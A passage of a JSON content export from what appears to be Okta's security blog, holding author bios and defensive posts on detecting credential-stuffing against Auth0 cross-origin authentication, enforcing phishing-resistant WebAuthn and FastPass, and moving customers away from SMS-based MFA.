flows.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-06-11T18:43:55.026Z","secAuthor":[{"id":"e0099522-136e-5003-b6a5-f4499896bf19","bio":{"bio":"<p>Brett Winterford is Vice President of Okta Threat Intelligence.  Okta Threat Intelligence delivers timely, highly relevant and actionable insights about the threat environment, with a focus on identity-based threats.  Brett was previously the regional Chief Security Officer for Okta in the Asia Pacific and Japan, and advised business and technology leaders in the region on all things identity. </br> Prior to Okta, Brett held a senior security leadership role at Symantec, and helmed security research, awareness and education at Commonwealth Bank.  
Brett is also an award-winning journalist, editor-in-chief of iTnews Australia and a contributor to the Risky Business podcast and newsletter, to ZDNet, the Australian Financial Review and the Sydney Morning Herald.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5cVIStynit3itWxHA4pv8S/8e8e647b20b34abcaff72ee837cb797c/Brett_20Resized.jpg"},"name":"Brett Winterford","jobTitle":"VP, Okta Threat Intelligence","slug":"brett-winterford","node_locale":"en"},{"id":"53f82036-02a9-5d61-bd70-4dc26074d4d1","bio":{"bio":"<p>Sean Hanrahan is a Senior Solutions Engineer, helping some of Okta’s largest accounts to solve their identity and security challenges with Okta’s technology. Prior to joining Okta, Sean worked for VMware as a customer success architect, focused on device security, unified endpoint management, SASE, and Zero Trust.</p>"},"image":null,"name":"Sean Hanrahan","jobTitle":"Senior Solutions Engineer","slug":"sean-hanrahan","node_locale":"en"}]},{"slug":"/articles/2024/05/detecting-cross-origin-authentication-credential-stuffing-attacks","id":"b49a7b51-bbc9-5896-aea2-07d49a960452","title":"Detecting Cross-Origin Authentication Credential Stuffing Attacks","date":"2024-05-28T16:38:31+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Summary\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has determined that the cross-origin authentication feature in Customer Identity Cloud (CIC) is prone to being targeted by threat actors orchestrating credential-stuffing attacks. 
As part of our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/secure-identity-commitment/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Secure Identity Commitment\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and commitment to customer security, we routinely monitor and review potentially suspicious activity and proactively send notifications to customers. In this case, we have proactively notified the customers we identified that have this feature enabled, and provided additional guidance in a customer email.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For context, we observed the endpoints used to support the cross-origin authentication feature being attacked via credential stuffing for a number of our customers. In this type of attack, adversaries attempt to sign in to online services using large lists of usernames and passwords potentially obtained from previous data breaches or unrelated entities, or from phishing or malware campaigns.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This post will assist you with investigating credential-stuffing attacks, as well as provide guidance in the “Recommended Actions” below.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Suspicious Activity Period\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We have observed suspicious activity that started on April 15. 
Please note that this may not be continuous for every tenant; we recommend reviewing suspicious activity from that date forward.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Log Events to Review:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"fcoa - Failed cross-origin authentication\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"scoa - Successful cross-origin authentication\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"pwd_leak - Someone attempted to login with a leaked password\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Recommended Actions\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Review tenant logs for unexpected fcoa, scoa, and pwd_leak events. 
Refer to the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/deploy-monitor/logs/log-event-type-codes\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Log Event Type Codes\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for more information.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If your tenant does not use cross-origin authentication, but `scoa` or `fcoa` events are present in event logs, then it is likely your tenant has been targeted in a credential stuffing attack.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If your tenant does use cross-origin authentication and either saw a spike of `scoa` events in April or an increase in the ratio of failure-to-success events (`fcoa`/`scoa`), then it is likely your tenant has been targeted in a credential stuffing attack.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If a user password was compromised in a credential stuffing attack, the user’s credentials should be \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/authenticate/database-connections/password-change\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"rotated immediately\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" out of an abundance of caution.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Protecting your Tenant from Credential Stuffing Activity\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Below are our recommendations on how to best protect your users from credential-stuffing 
attacks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Longer-term solution:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enroll users in passwordless, phishing-resistant authentication. We recommend the use of passkeys as the most secure option. Passkeys are included on all Auth0 plans from our free plan through Enterprise.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Medium-term mitigations:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Prevent users from choosing weak passwords. Require a minimum of 12 characters and no parts of the user name. Block passwords found in the Common Password List. This can be done in the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/authenticate/database-connections/password-options\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"password policy\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Require Multi-Factor Authentication. 
Auth0 offers a variety of MFA options available on our B2C Professional, B2B Essentials, B2B Professional, Startup, and Enterprise plans.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Short-term mitigations:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For any tenant that does not use \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/authenticate/login/cross-origin-authentication\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"cross-origin authentication\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", that endpoint can be disabled in the Auth0 Management Console to eliminate this attack vector. Refer to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/get-started/applications/set-up-cors#configure-cross-origin-authentication\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Configure Cross-Origin Resource Sharing\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for more information.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Restrict permitted origins if cross-origin authentication is required.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enable \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/secure/attack-protection/breached-password-detection#configure-breached-password-detection\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"breached password 
detection\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for your tenant, or ideally \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/secure/attack-protection/breached-password-detection#detect-breaches-faster-with-credential-guard\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Credential Guard\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" if it is supported in your current plan.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Breached password detection is available on our B2C Professional, B2B Professional, Startup, and Enterprise plans.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Credential Guard is available as an add-on through an Enterprise plan.\",\"marks\":[],\"data\":{}}]}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If you have an account with support available and need more information, you can reach out to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.auth0.com/tickets/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Customer Support\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", and if you are on a free plan you can reach us via the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://community.auth0.com/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Community\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". 
For details on features and availability per plan, please visit our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/pricing\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"pricing page\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-06-08T05:27:37.411Z","secAuthor":[{"id":"1e934185-d220-5cf6-915f-afe21369ab6b","bio":{"bio":""},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/2mSwf13fQ5aH31DZNddqtd/0855adabe0c07ddc9ceaa460ebd1d935/Okta_Aura_CMYK_Black.jpg"},"name":"Okta","jobTitle":"","slug":"okta","node_locale":"en"}]},{"slug":"/articles/2023/07/unexpected-endorsement-webauthn","id":"d02e836f-c1d9-5f32-9584-8646872c9643","title":"An Unexpected Endorsement for WebAuthn","date":"2023-07-27T01:43:04+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Security endorses phishing resistant authentication at every opportunity.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We’ve long argued enrolling users in Okta FastPass, FIDO2 WebAuthn authenticators or Smart Cards, and enforcing phishing resistant authentication flows will:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Protect users against \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/phishingasaservice\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"real-time phishing proxies\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and other 
forms of \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/sessioncookietheft\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"session hijacking\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Solve for far more attacks than simply adding Number Challenge to Push notifications to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/pushfatigueworkflows\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"defeat MFA Fatigue\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Offer \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/fastpassphishingdetection\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"detection opportunities\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" via System Log and the automation of phishing remediation, identifying potential account takeovers and preventing future attacks in a few seconds.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Provide a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/the-secure-sign-in-trends-report/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"superior user experience\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", without any adverse impacts on enrolment duration or failure 
rates.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"But don’t take our word for it.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The SMS below was recently sent by a prolific threat actor attempting to convince users at a large tech company to click through to a phishing kit:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"7HJAWRoNL2BhR1QErz58io\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"That’s probably the best endorsement for enforcing phishing-resistant sign-in yet!\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enforcement is everything\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Celebrity endorsements aside, this is a story about enforcement.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Step one to thwarting phishing attacks is to require users to enroll in strong authenticators. Users required to enroll in Okta FastPass or FIDO2 WebAuthn can authenticate to just about any app that requires two distinct factors. Independently, each of these two authenticators can satisfy possession and inherence factors in 2-3 seconds.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"But that’s not where the task ends.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As this crafty lure demonstrates, step two is to enforce phishing resistance in policy, as seen in the screenshot below. 
Social engineers may otherwise convince users to accept a lower-assurance authenticator (passwords, OTPs, push notifications), on the chance that those sign-in methods satisfy policy requirements.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"6hmPALkOzevI3fGYl5mFev\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This lure also demonstrates why a little redundancy can go a long way.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We recommend requiring users to enroll in \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"both\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" Okta FastPass and FIDO2 WebAuthn (rather than FastPass “or” FIDO2), as well as enforcing phishing resistance.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"That might sound like overkill: both authenticators would protect the user from compromise, and both can be configured to satisfy two factors in one gesture. So why have both enrolled?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If a threat actor did manage to convince a user to unplug their security key, the tricked user would still be able to sign in to your organization using FastPass - just not via the attacker’s proxy! 
And as an added bonus, it may ease the pain on support teams if users are prone to misplacing their security keys.\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-06-07T21:46:05.008Z","secAuthor":[{"id":"40144a58-c93f-5b84-895a-5658f212b168","bio":{"bio":"<p>The Defensive Cyber Operations (DCO) team is responsible for detecting and responding to cyber threats that impact Okta or our customers via the Okta platform. Our intelligence-driven capability identifies the adversaries most likely to impact Okta and our customers, and prioritises our defensive capabilities based on the threats most likely to be realised.</p>"},"image":null,"name":"Defensive Cyber Operations","jobTitle":"","slug":"defensive-cyber-operations","node_locale":"en"},{"id":"e0099522-136e-5003-b6a5-f4499896bf19","bio":{"bio":"<p>Brett Winterford is Vice President of Okta Threat Intelligence.  Okta Threat Intelligence delivers timely, highly relevant and actionable insights about the threat environment, with a focus on identity-based threats.  Brett was previously the regional Chief Security Officer for Okta in the Asia Pacific and Japan, and advised business and technology leaders in the region on all things identity. </br> Prior to Okta, Brett held a senior security leadership role at Symantec, and helmed security research, awareness and education at Commonwealth Bank.  
Brett is also an award-winning journalist, editor-in-chief of iTnews Australia and a contributor to the Risky Business podcast and newsletter, to ZDNet, the Australian Financial Review and the Sydney Morning Herald.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5cVIStynit3itWxHA4pv8S/8e8e647b20b34abcaff72ee837cb797c/Brett_20Resized.jpg"},"name":"Brett Winterford","jobTitle":"VP, Okta Threat Intelligence","slug":"brett-winterford","node_locale":"en"}]},{"slug":"/articles/2023/08/byo-telephony-and-future-sms-okta","id":"3f6606c3-8476-5f37-8b3a-ef7166c4f5b7","title":"BYO Telephony and the future of SMS at Okta","date":"2023-08-28T21:23:39+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SMS has long played an important role as a universally applicable method of verifying a user’s identity via one-time passcodes. 
And over the last decade, SMS and voice-based Multi-factor Authentication has prevented untold attempts to compromise user accounts.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"But it’s time to move on.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As of August 2023, any new Okta customer choosing to authenticate users via SMS or voice must configure their own \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/telephony/about-telephony.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Telephony\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" provider, just as they would any other \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/MFA_Custom_Factor.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"custom IdP\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" or \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/mfa-totp-seed.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"custom TOTP\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" factor. Starting September 15, 2024, at time of renewal, all existing customers must also bring their own telephony provider if they choose to continue to use SMS or voice.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In order to maintain flexibility, Okta doesn’t intend to deprecate the SMS authenticator. 
Nonetheless, Okta Security urges customers to accelerate their transition to passwordless with \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/phishingasaservice\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"phishing-resistant factors\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" like FastPass or FIDO2 WebAuthn.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The good news? Migrating users to FastPass comes at no additional licensing cost.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SMS offers limited assurance\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Let’s explore some of the reasons why customers should begin planning a transition away from SMS/Voice:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"ordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SMS lacks phishing resistance\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The one-time secret communicated in an SMS is not cryptographically bound in any way to the authenticator. There is nothing to stop an adversary from extracting the secret during phishing or social engineering attacks, and modern phishing tools make it trivial to defeat SMS-based authentication. 
Phishing Resistance is a property that only Okta FastPass, FIDO2 Webauthn and PIV Smart Cards offer in the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/authenticators/phishing-resistant-auth.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Identity Engine\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" today.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"2. The channel for sending secrets is outside of your organization’s control\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Personal webmail and SMS are two categories of authenticator in which the channel for communication of a secret lies outside of the control of the IT administrator. This property can and often has been exploited by adversaries. The most common form of abuse is when adversaries convince support staff at telecommunications providers to perform a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://krebsonsecurity.com/2022/08/how-1-time-passcodes-became-a-corporate-liability/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"SIM Swap\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", moving the target account for one time secrets to a mobile device they control. There are other examples of adversaries using \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.cyber.nj.gov/informational-report/sim-swapping-attacks\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"social engineering or bribes\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" with staff at telecommunications providers to perform SIM swapping. 
At the more extreme end, adversaries have attacked telecommunications providers or organizations that generate OTPs directly in an attempt to perform SIM Swaps or intercept OTPs sent to user devices.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"3. SMS does not offer device signals\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As described above, SMS doesn’t link a user with a device they possess with very high assurance. This is a property that Okta Verify (using either FastPass or Push notifications) and FIDO2 WebAuthn can satisfy. FastPass Device Assurance can also \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/devices/device-assurance.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"assess the posture (health) of the device\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" associated with a user signing in. Little wonder that, given a choice, adversaries tend to add and use the SMS/voice factor over others to sign in to compromised accounts.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"4. SMS underperforms on usability\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As Okta’s recent \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/the-secure-sign-in-trends-report/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Secure SignIn Trends\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" report demonstrated, it takes around three times longer for a user to log in via password and SMS than via passwordless, phishing-resistant authenticators. 
It’s also more subject to user error, generating large volumes of benign events that offer little in the way of confidence to a security analyst.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What your regulator thinks of SMS\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"It doesn’t take an expert in forecasting to note which way the wind is blowing for SMS-based MFA. As far back as 2017, NIST recommended against using phone-based authentication such as SMS in the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://pages.nist.gov/800-63-3/sp800-63b.html#restricted\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"800-63-3 guidance document\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Earlier this month, the US Cyber Safety Review Board \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.cisa.gov/sites/default/files/2023-08/CSRB_Lapsus%24_508c.pdf\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"recommended\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that \\\"organizations urgently implement improved access controls and authentication methods and transition away from voice and SMS-based MFA.\\\" In a recent settlement, the Federal Trade Commission 